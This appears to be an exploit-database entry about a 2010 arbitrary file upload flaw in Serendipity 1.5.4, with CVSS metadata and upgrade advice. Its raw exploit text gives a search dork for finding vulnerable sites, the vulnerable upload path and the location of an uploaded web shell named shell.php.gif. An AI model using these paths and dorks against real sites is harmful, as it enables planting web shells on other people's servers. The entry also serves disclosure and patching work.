header-logo
Suggest Exploit
vendor:
Serendipity
by:
pentesters.ir
7,5
CVSS
HIGH
File Upload
434
CWE
Product Name: Serendipity
Affected Version From: 1.5.4
Affected Version To: 1.5.4
Patch Exists: YES
Related CWE: N/A
CPE: a:s9y:serendipity
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

remote 0day file upload

A vulnerability exists in Serendipity 1.5.4 which allows remote attackers to upload arbitrary files via the manager.php page in the htmlarea/plugins/ExtendedFileManager/ directory.

Mitigation:

Upgrade to the latest version of Serendipity
Source

Exploit-DB raw data:

In The Name Of GOD 
[+] Exploit Title:remote 0day file upload
[+] Date: 2010
[+] script:Serendipity 1.5.4
[+] Software Link: http://www.s9y.org/12.html
[+] Author  : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : kivi_hacker666@yahoo.com
[+] Website : WwW.PenTesters.IR 
[+] Greeting: Behzad, navid, ...
[+]dork:"Powered by s9y"  and  "Powered by serendipity"
----------------------------------------------------------------------------
up:
/path/htmlarea/plugins/ExtendedFileManager/manager.php

shell:
/htmlarea/plugins/ExtendedFileManager/demo_images/shell.php.gif
------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR